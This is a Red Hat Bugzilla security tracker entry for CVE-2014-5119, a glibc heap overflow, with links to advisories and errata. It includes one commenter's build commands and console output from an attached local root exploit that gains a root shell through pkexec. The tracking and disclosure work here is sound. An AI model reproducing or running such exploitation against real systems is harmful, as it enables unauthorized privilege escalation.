Bug 1119128 (CVE-2014-5119)
| Summary: | CVE-2014-5119 glibc: off-by-one error leading to a heap-based buffer overflow flaw in __gconv_translit_find() | ||||||
|---|---|---|---|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Murray McAllister <mmcallis> | ||||
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> | ||||
| Status: | CLOSED ERRATA | QA Contact: | |||||
| Severity: | high | Docs Contact: | |||||
| Priority: | high | ||||||
| Version: | unspecified | CC: | agk, ashankar, baumanmo, bhubbard, brwillia, btotty, carnil, codonell, dwalsh, fweimer, hartsjc, jakub, jrusnack, kabbott, karlamrhein, klamb, law, michele, mitr, pablo.iranzo, pfrankli, pkoro, rbarlow, rfreire, rhaggard, rjsm, sauchter, sbeal, seldridg, spoyarek, sroza, taviso, vanhoof, vdanen, vkaigoro | ||||
| Target Milestone: | --- | Keywords: | Security | ||||
| Target Release: | --- | ||||||
| Hardware: | All | ||||||
| OS: | Linux | ||||||
| URL: | https://sourceware.org/ml/libc-alpha/2014-08/threads.html#00352 | ||||||
| Whiteboard: | |||||||
| Fixed In Version: | Doc Type: | Bug Fix | |||||
| Doc Text: |
An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.
|
Story Points: | --- | ||||
| Clone Of: | Environment: | ||||||
| Last Closed: | 2014-08-29 21:50:01 UTC | Type: | --- | ||||
| Regression: | --- | Mount Type: | --- | ||||
| Documentation: | --- | CRM: | |||||
| Verified Versions: | Category: | --- | |||||
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |||||
| Cloudforms Team: | --- | Target Upstream Version: | |||||
| Embargoed: | |||||||
| Bug Depends On: | 1129745, 1133807, 1133808, 1133809, 1133810, 1133811, 1133812, 1134210, 1134211, 1134212, 1134213 | ||||||
| Bug Blocks: | 1119129, 1129744 | ||||||
| Attachments: |
|
||||||
|
Description
Murray McAllister
2014-07-14 05:30:08 UTC
MITRE assigned CVE-2014-5119 to this issue: http://seclists.org/oss-sec/2014/q3/358 Upstream bug: https://sourceware.org/bugzilla/show_bug.cgi?id=17187 *** Bug 1129743 has been marked as a duplicate of this bug. *** Further information from Tavis Ormandy: https://sourceware.org/ml/libc-alpha/2014-07/msg00590.html Created attachment 930687 [details] CVE-2014-5119 exploit for Fedora 20 32-bit It's been a few months without progress, here's an exploit. $ make clean rm -f pkexploit pty *.o a.out *.so [taviso@localhost glibc]$ make cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl pkexploit.c -o pkexploit cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -ldl pty.c -o pty cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320 -c -o exploit.o exploit.c cc exploit.o -fPIC -shared -o exploit.so Execute pkexploit to attempt exploitation. [taviso@localhost glibc]$ ./pkexploit [*] --------------------------------------------------- [*] CVE-2014-5119 glibc __gconv_translit_find() exploit [*] ------------------------ taviso & scarybeasts ----- [*] Attempting to invoke pseudo-pty helper (this will take a few seconds)... [*] Read 7295 bytes of output from pseudo-pty helper, parsing... [*] pseudo-pty helper succeeded [*] attempting to parse libc fatal error message... [*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658 [*] attempting to parse the libc maps dump... [*] found libc.so mapped @0x40215000 [*] expecting libc.so bss to begin at 0x406c7000 [*] successfully located first morecore chunk w/tag @0x407d6000 [*] allocating space for argument structure... [*] creating command string... [*] creating a tls_dtor_list node... [*] open_translit() symbol will be at 0x40238320 [*] offsetof(struct known_trans, fname) => 32 [*] appending `./exploit.so` to list node [*] building parameter list... [*] anticipating tls_dtor_list to be at 0x406c82d4 [*] execvpe(pkexec...)... Error accessing /: File name too long uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 sh-4.2# exit exit Statement: (none) Reference: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html https://code.google.com/p/google-security-research/issues/detail?id=96 Upstream commit: https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commitdiff;h=a1a6a401ab0a3c9f15fb7eaebbdcee24192254e8 It removes affected functionality - support for loadable gconv transliteration modules - which was non-functional for a long time. IssueDescription: An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application. This issue has been addressed in following products: Red Hat Enterprise Linux 5 Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 Via RHSA-2014:1110 https://rhn.redhat.com/errata/RHSA-2014-1110.html This issue has been addressed in following products: Red Hat Enterprise Linux 5.6 Long Life Red Hat Enterprise Linux 5.9 EUS - Server Only Red Hat Enterprise Linux 6.2 AUS Red Hat Enterprise Linux 6.4 EUS - Server and Compute Node Only Via RHSA-2014:1118 https://rhn.redhat.com/errata/RHSA-2014-1118.html |